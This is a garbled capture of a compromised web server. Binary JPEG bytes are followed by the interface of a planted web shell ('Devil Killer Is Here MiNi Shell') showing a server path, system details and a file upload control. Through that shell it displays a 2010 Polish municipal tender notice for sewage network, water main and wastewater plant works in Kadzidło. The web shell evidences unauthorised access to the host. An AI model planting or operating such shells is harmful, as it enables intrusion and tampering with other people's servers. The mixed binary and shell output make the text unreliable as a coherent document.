JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100805/209837-N-2010.html

<p class="kh_header"><b>Kadzidło: Kanalizacja sanitarna dla msc. Kadzidło - osiedle Podtatrze z rozbudową oczyszczalni ścieków i wodociągu w Kadzidle</b><br>
<b>Numer ogłoszenia: 209837 - 2010; data zamieszczenia: 05.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kadzidło , ul. Targowa 4, 07-420 Kadzidło, woj. mazowieckie, tel. 029 7618016.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kadzidlo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kanalizacja sanitarna dla msc. Kadzidło - osiedle Podtatrze z rozbudową oczyszczalni ścieków i wodociągu w Kadzidle.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych dotyczących Kanalizacji sanitarnej dla msc. Kadzidło - osiedle Podtatrze z rozbudową oczyszczalni ścieków i wodociągu w Kadzidle, przy czym dopuszcza się składanie ofert częściowych na wykonanie robót budowlanych dla zadań: 
1) Zaprojektowanie i rozbudowa oczyszczalni ścieków w Kadzidle - jako część Nr 1,                        
2) Kanalizacja sanitarna w osiedlach Podtatarza Kadzidle i Rozbudowa sieci      
    wodociągowej w Kadzidle - jako część Nr 2.

Opis poszczególnych części zamówienia:  

Część Nr 1 - Zaprojektowanie i rozbudowa oczyszczalni ścieków w Kadzidle
       Kod wg CPV: 45252127-4    Roboty budowlane w zakresie oczyszczalni  ścieków
                               71320000-7    Usługi inżynieryjne w zakresie projektowania 

Przedmiotem zamówienia jest Zaprojektowanie i rozbudowa oczyszczalni ścieków w Kadzidle zlokalizowanej na działkach o numerach ewidencyjnych: Nr 47/2, 47/1, 45/1 - ul. Lokalna 
w Kadzidle, na podstawie Programu Funkcjonalno - Użytkowego. Przepustowość  oczyszczalni ścieków, jaką winien uwzględnić Wykonawca w opracowywanym projekcie budowlanym wyniesie Qśr. = 710 m3/d, Qmax.d = 828 m3/d, Qmax.h =62 m3/h. 
Zakres zamówienia obejmuje:
1)	wykonanie, zgodnie z wymogami określonymi w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2000 r. Nr 106, poz. 1126 z późn. zm.), projektu budowlanego we wszystkich branżach inżynierskich i architektonicznych, dla oczyszczalni ścieków w Kadzidle oraz uzyskanie wszelkich opinii, uzgodnień, pozwoleń i innych dokumentów wymaganych przepisami szczególnymi, niezbędnych do uzyskania decyzji o pozwoleniu na budowę; 
2)	wykonanie, zgodnie z wymogami określonymi w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2000 r. Nr 106, poz. 1126 z późn. zm.), projektu wykonawczego we wszystkich niezbędnych branżach inżynierskich i architektonicznych, operatu wodnoprawnego dla oczyszczalni ścieków w Kadzidle oraz uzyskanie wszelkich opinii, uzgodnień, pozwoleń i innych dokumentów wymaganych przepisami szczególnymi, niezbędnych do uzyskania zmiany decyzji pozwolenia wodnoprawnego; 
3)	wykonanie pełnego zakresu robót ujętych w projektach,
4)	wykonanie niezbędnych robót towarzyszących (zorganizowanie placu budowy, biura, zaplecza budowy, uporządkowania terenu po pracach ),
5)	uruchomienie oraz wykonanie rozruchu i przekazanie po uzyskaniu założonego efektu ekologicznego oczyszczalni do eksploatacji, 
6)	dokonanie przeszkolenia personelu przyszłego użytkownika wybudowanych obiektów - 5 osób.
7)	usługi serwisowe w okresie gwarancyjnym - wymagany czas reakcji na usunięcie awarii - 24 godziny od momentu zgłoszenia. W przypadkach zagrażających bezpieczeństwu obiektu lub niebezpieczeństwu związanemu z ochroną środowiska wymagany czas reakcji na rozpoczęcie usuwania awarii - 4 godziny.
Zakres prac  projektowych do wykonania (I faza - ZAPROJEKTUJ):
-	weryfikacja kompletności wszystkich danych niezbędnych dla prawidłowego zaprojektowania
       i wykonania przedmiotu umowy,
-	Wykonanie niezbędnych badań geologicznych i opinii geotechnicznej lub dokumentacji
geologiczno-inżynierskiej,
-	Wykonanie pomiarów geodezyjnych i map do celów projektowych,
-	Uzyskanie wyrysu i wypisu z rejestru gruntów,
-	Wykonanie inwentaryzacji istniejących obiektów, urządzeń i sieci w zakresie potrzebnym
do wykonania Projektu budowlanego i wielobranżowego wykonawczego,
-	Wykonanie opisowej i graficznej wersji roboczej Projektu budowlanego wraz z opisem
technicznym, technologicznym oraz materiałowym zaprojektowanych obiektów i urządzeń,
umożliwiających weryfikację pod kątem zgodności z PFU i przedłożenie do akceptacji
Zamawiającemu,
-	wykonanie projektów budowlanych wraz z niezbędnymi rysunkami szczegółowymi we wszystkich branżach inżynierskich i architektonicznych, min 6 egz. + wersja elektroniczna,
-	wykonanie projektów wykonawczych wraz z niezbędnymi rysunkami szczegółowymi we wszystkich branżach inżynierskich i architektonicznych, min. 4 egz. + wersja elektroniczna,
-	uzyskanie wszelkich pozwoleń, opinii, uzgodnień i innych dokumentów niezbędnych do uzyskania pozwolenia na budowę,
-	wykonanie operatu wodno-prawnego,
-	przygotowanie wniosku oraz niezbędnych dokumentów do uzyskania zmiany pozwolenia wodno - prawnego,
-	zapewnienie nadzoru autorskiego w całym okresie realizacji umowy,
-	opracowanie Planu Bezpieczeństwa Pracy i Ochrony Zdrowia,
-	opracowanie harmonogramu rzeczowo-finansowego robót objętych zamówieniem
z wydzieleniem prac projektowych, robót budowlanych i rozruchu.

Zakres robót budowlanych do wykonania ( II faza - WYBUDUJ) obejmuje:
-	wykonanie pełnego zakresu robót ujętych w projekcie, łącznie z realizacją dostaw urządzeń,
-	wykonanie niezbędnych robót towarzyszących (zorganizowanie placu budowy, biura, zaplecza budowy, uporządkowania terenu po pracach itp.),
-	pokrycie wszelkich kosztów i opłat z tytułu uzgodnień, nadzoru gestorów uzbrojenia terenu,
itp.
-	prowadzenie pełnej obsługi geodezyjnej w czasie robót, w tym sporządzenie operatów,
-	wykonanie inwentaryzacji powykonawczej i przekazanie jej do właściwego ośrodka celem
uzgodnienia,
-	wywóz, zagospodarowanie lub utylizacja odpadów powstałych w związku z prowadzonymi
robotami,
-	wykonanie instrukcji i oznakowań obiektów zgodnie z obowiązującymi przepisami.

   Zorganizowanie i przeprowadzenie prób, badań i odbiorów
-  opracowanie dokumentacji powykonawczej,
-  wykonanie instrukcji rozruchu, BHP, obsługi i konserwacji urządzeń,
-  zorganizowanie i przeprowadzenie rozruchu techniczno-technologicznego nowych obiektów
    i instalacji, wraz z opracowaniem i przekazaniem Zamawiającemu protokołu z ww.  rozruchu
-  uporządkowanie i odtworzenie terenu po zakończeniu budowy,
-  wykonanie Operatu Wodno-prawnego, sporządzenie kompletnego wniosku i uzyskanie w imieniu i 
    na rzecz Zamawiającego Decyzji pozwolenia na użytkowanie obiektu,
-  sporządzenie szczegółowego rozbicia wykazu cen dla poszczególnych pozycji w zakresie
   dotyczącym klasyfikacji środków trwałych według KŚT,
-  przekazanie obiektów modernizowanej części oczyszczalni z obiektami towarzyszącymi ( jako
   kompletnej, sprawnej instalacji wraz z wszelkimi dodatkowymi obiektami kubaturowymi,
   liniowymi i powierzchniowymi) do eksploatacji wraz ze wszystkimi niezbędnymi dokumentami,
-  dokonanie przeszkolenia personelu przyszłego użytkownika wybudowanych obiektów,
-  świadczenie usług gwarancyjnych,
-  zapewnienie w okresie gwarancji pełnego i nieodpłatnego serwisu gwarancyjnego - wymagany  
    czas reakcji na usunięcie awarii - 24 godziny od momentu zgłoszenia. W przypadkach 
    zagrażających bezpieczeństwu obiektu lub niebezpieczeństwu związanemu z ochroną 
    środowiska wymagany czas reakcji na rozpoczęcie usuwania awarii - 4 godziny. 

Szczegółowy opis przedmiotu zamówienia został określony w Programie funkcjonalno użytkowym i decyzji o środowiskowych uwarunkowaniach zgody na realizacji przedsięwzięcia, które są dostępne w wersji elektronicznej na stronie internetowej zamawiającego i stanowią załączniki do niniejszej SIWZ. 
Zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej i zebranie niezbędnych informacji do sporządzenia oferty.
Zasilenie placu budowy w energię elektryczną i wodę Wykonawca zobowiązany będzie wykonać na własny koszt po uzgodnieniu warunków z dostawcami mediów. 

Podwykonawcy -  Wykonawca zobowiązany jest wskazać w ofercie części zamówienia, których wykonanie powierzy podwykonawcy. Zamawiający nie dopuszcza zlecenia całości zamówienia podwykonawcom. Wykonawca może podzlecić podwykonawcom prace projektowe, dostawę  i montaż urządzeń.

Część Nr 2 - Kanalizacja sanitarna w osiedlach Podtatarza Kadzidle i rozbudowa sieci      
                      wodociągowej w Kadzidle
Kod wg CPV: 45232410-9  Roboty w zakresie kanalizacji ściekowej
45232423-3  Roboty budowlane w zakresie przepompowni ścieków
45231300-8  Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków


W zakres wchodzą następujące roboty:
Etap I:
1.	Modernizacja budynku przepompowni głównej wraz z zagospodarowaniem terenu- 1  szt.
2.	Budowa przepompowni strefowych oraz instalacje elektryczne - 15 szt.
Etap II:
1. Sieci kanalizacyjne             -  6.770 m.
2. Pompownie strefowe          -  4 szt. 
3. Przykanaliki                        - 146/2.636 szt./m
4. Sieci i instalacje elektryczne   - wg projektu.

Rozbudowa sieci wodociągowej:
1. Sieć wodociągowa o średnicy 160 mm   - 1244  m
2. Sieć wodociągowa o średnicy 110 mm   -   934  m
3. Sieć wodociągowa o średnicy   90 mm   -   665  m
4. Sieć przyłączeniowa (przyłącza w drogach publicznych) o śr. 40 mm -121 m
5. Studzienki wodomierzowe                 -  9 szt./80 m    

Zakres prac do wykonania ujęty jest w dokumentacji projektowej, przedmiarach robót, specyfikacjach technicznych wykonania i odbioru robót, które są dostępne w wersji elektronicznej na stronie internetowej zamawiającego i stanowią załączniki do niniejszej SIWZ. 
Zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej i zebranie niezbędnych informacji do sporządzenia oferty.
Roboty budowlane należy wykonać zgodnie z Ustawą - Prawo Budowlane (Dz. U. z 2006 r. Nr
156, poz. 1118 z późn. zmianami), dokumentacja techniczna, specyfikacja techniczna wykonania i odbioru robót, sztuką budowlaną, wszelkimi niezbędnymi przepisami oraz zasadami współczesnej wiedzy technicznej, zapewniając bezpieczne i higieniczne warunki pracy, stosując wyroby budowlane posiadające stosowne certyfikaty, deklaracje zgodności, atesty i aprobaty techniczne.
Wszystkie ewentualne nazwy  wyrobów (urządzeń, materiałów, surowców) użyte w dokumentacji budowlano-wykonawczej są podane przykładowo i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard. Zamawiający dopuszcza zastosowanie wyrobów równoważnych pod warunkiem spełniania przez nie parametrów równoważności określonych w dokumentacji i specyfikacji technicznej wykonania i odbioru robót. Ciężar udowodnienia zachowania tych parametrów spoczywa na wykonawcy.
Zasilenie placu budowy w energię elektryczną i wodę Wykonawca zobowiązany będzie wykonać na własny koszt po uzgodnieniu warunków z dostawcami mediów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9, 45.25.21.27-4, 45.23.24.23-3, 45.23.13.00-8, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości 70.000,00 zł dla Części Nr 1 zamówienia oraz w wysokości 50.000,00 zł dla Części Nr 2.(120.000,00 zł na całe zadanie). Wadium należy wnieść przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni czy Wykonawca spełnia warunek, o którym mowa w powyżej na podstawie złożonego w ofercie oświadczenia o spełnieniu warunków udziału w postępowaniu.
Ocena warunków udziału w postępowaniu zostanie dokonana na zasadzie spełnia/nie spełnia. Zamawiający na podstawie złożonych w ofercie dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku. W przypadku gdy wymóg spełnienia warunku zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za spełniony. W przypadku gdy wymóg spełnienia warunku nie zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za nie spełniony z zastrzeżeniem art. 26 ust. 3 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ten warunek, jeżeli:
a) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania (a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) wykonał roboty odpowiadające swoim rodzajem robotom stanowiącym główny przedmiot zamówienia, tj.:
Dla części Nr 1 zamówienia
-  co najmniej jedną robotę budowlaną polegającą na budowie, rozbudowie lub modernizacji oczyszczalni ścieków o średniej wydajności co najmniej 250 m3/dobę oraz budowę szczelnych zbiorników żelbetowych, z podaniem wartości robót, dat i miejsca wykonania oraz zamawiającego, przy czym wykazanie doświadczenia w zakresie budowy, rozbudowy lub modernizacji oczyszczalni ścieków o średniej wydajności co najmniej 250 m3/dobę jest bezwzględnie wymagane. Łączna wartość wymaganych robót brutto  -  min. 6 000 000,00 PLN.

Dla części Nr 2 zamówienia
- roboty w zakresie kanalizacji sanitarnej za  łączną kwotę co najmniej 3,0 mln. zł, brutto; 
oraz załączy dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
1) Zamawiający oceni czy Wykonawca spełnia warunek, o którym mowa w powyżej na podstawie złożonego w ofercie oświadczenia o spełnieniu warunków udziału w postępowaniu oraz dokumentów żądanych przez Zamawiającego wymienionych w rozdz. VII SIWZ potwierdzających spełnienie tych warunków;
2) Ocena warunków udziału w postępowaniu zostanie dokonana na zasadzie spełnia/nie spełnia. Zamawiający na podstawie złożonych w ofercie dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku. W przypadku gdy wymóg spełnienia warunku zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za spełniony. W przypadku gdy wymóg spełnienia warunku nie zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za nie spełniony z zastrzeżeniem art. 26 ust. 3 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni czy Wykonawca spełnia warunek, o którym mowa w powyżej na podstawie złożonego w ofercie oświadczenia o spełnieniu warunków udziału w postępowaniu.
Ocena warunków udziału w postępowaniu zostanie dokonana na zasadzie spełnia/nie spełnia. Zamawiający na podstawie złożonych w ofercie dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku. W przypadku gdy wymóg spełnienia warunku zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za spełniony. W przypadku gdy wymóg spełnienia warunku nie zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za nie spełniony z zastrzeżeniem art. 26 ust. 3 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ten warunek,  jeżeli: 

Dla części Nr 1 zamówienia
Dysponuje osobami posiadającymi uprawnienia budowlane które są wpisane na listę członków właściwej izby samorządu zawodowego, na stanowiska:
- Kierownik budowy  - musi posiadać, co najmniej 5 lat stażu pracy jako kierownik budowy oraz  
   uprawnienia budowlane w specjalności konstrukcyjno - budowlanej lub specjalności   
   instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych.
- Kierownik Zespołu Projektowego - Technolog musi posiadać doświadczenie zawodowe w
   projektowaniu technologii oczyszczania ścieków, co najmniej dwa projekty technologii dla
   budowy,  rozbudowy lub modernizacji oczyszczalni ścieków oraz uprawnienia do
   projektowania w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych.
- Kierownik robót budowlanych - musi posiadać, co najmniej 3 lata stażu pracy jako kierownik
   robót budowlanych oraz uprawnienia budowlane w specjalności konstrukcyjno - budowlanej,
- Kierownik robót sanitarnych - musi posiadać, co najmniej 3 lata stażu pracy jako kierownik
   robót sanitarnych oraz uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci
   i instalacji sanitarnych, (wodociągowych, kanalizacyjnych),
- Kierownik robót elektrycznych - musi posiadać, co najmniej 3 lata stażu pracy jako kierownik
   robót elektrycznych oraz uprawnienia budowlane w specjalności instalacyjnej w zakresie
   sieci i instalacji elektrycznych;
Dla części Nr 2 zamówienia 
Dysponuje osobami posiadającymi uprawnienia budowlane które są wpisane na listę członków właściwej izby samorządu zawodowego, na stanowiska:
- Kierownik budowy  - musi posiadać, co najmniej 5 lat stażu pracy jako kierownik budowy oraz  
   uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  
   wodociągowych i kanalizacyjnych,
- Kierownik robót sanitarnych - musi posiadać, co najmniej 3 lata stażu pracy jako kierownik
   robót sanitarnych oraz uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci
   i instalacji sanitarnych, (wodociągowych, kanalizacyjnych),
- Kierownik robót elektrycznych - musi posiadać, co najmniej 3 lata stażu pracy jako kierownik
   robót elektrycznych oraz uprawnienia budowlane w specjalności instalacyjnej w zakresie
   sieci i instalacji elektrycznych;
- Kierownik robót drogowych - musi posiadać, co najmniej 3 lata stażu pracy oraz uprawnienia 
  o specjalności drogowej.
1) Zamawiający oceni czy Wykonawca spełnia warunek, o którym mowa w powyżej na podstawie złożonego w ofercie oświadczenia o spełnieniu warunków udziału w postępowaniu oraz dokumentów żądanych przez Zamawiającego wymienionych w rozdz. VII SIWZ potwierdzających spełnienie tych warunków;
2) Ocena warunków udziału w postępowaniu zostanie dokonana na zasadzie spełnia/nie spełnia. Zamawiający na podstawie złożonych w ofercie dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku. W przypadku gdy wymóg spełnienia warunku zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za spełniony. W przypadku gdy wymóg spełnienia warunku nie zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za nie spełniony z zastrzeżeniem art. 26 ust. 3 ustawy pzp;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej: 
-  dla części Nr1 zamówienia - 1.500. 000 zł,
-  dla części Nr 2 zamówienia - 1.500.000 zł, 
b) wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
     działalności,
5) Udzielą gwarancji na wykonane roboty min. 36 m-cy.
1) Zamawiający oceni czy Wykonawca spełnia warunek, o którym mowa w powyżej na podstawie złożonego w ofercie oświadczenia o spełnieniu warunków udziału w postępowaniu oraz dokumentów żądanych przez Zamawiającego wymienionych w rozdz. VII SIWZ potwierdzających spełnienie tych warunków;
2) Ocena warunków udziału w postępowaniu zostanie dokonana na zasadzie spełnia/nie spełnia. Zamawiający na podstawie złożonych w ofercie dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku. W przypadku gdy wymóg spełnienia warunku zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za spełniony. W przypadku gdy wymóg spełnienia warunku nie zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za nie spełniony z zastrzeżeniem art. 26 ust. 3 ustawy pzp;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

